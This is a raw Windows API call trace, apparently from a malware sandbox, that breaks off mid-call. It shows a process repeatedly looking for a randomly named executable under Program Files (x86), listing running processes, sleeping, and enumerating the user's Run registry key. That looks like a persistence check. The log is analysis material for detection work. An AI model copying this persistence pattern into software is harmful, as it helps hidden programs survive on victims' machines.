[0175.473] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.473] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.474] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.485] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.485] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.485] NtClose (Handle=0x14c) returned 0x0 [0175.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.485] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.485] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.486] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.486] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.490] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.501] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.501] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.501] NtClose (Handle=0x14c) returned 0x0 [0175.501] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.501] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.501] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.501] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.501] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.501] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.506] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.516] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.516] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.516] NtClose (Handle=0x14c) returned 0x0 [0175.516] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.516] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.517] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.517] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.517] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.517] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.521] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.532] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.532] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.532] NtClose (Handle=0x14c) returned 0x0 [0175.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.532] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.532] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.532] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.532] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.537] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.547] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.547] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.547] NtClose (Handle=0x14c) returned 0x0 [0175.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.548] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.548] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.548] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.548] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.552] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.565] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.566] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.566] NtClose (Handle=0x14c) returned 0x0 [0175.566] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.566] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.566] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.566] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.566] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.566] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.570] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.579] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, 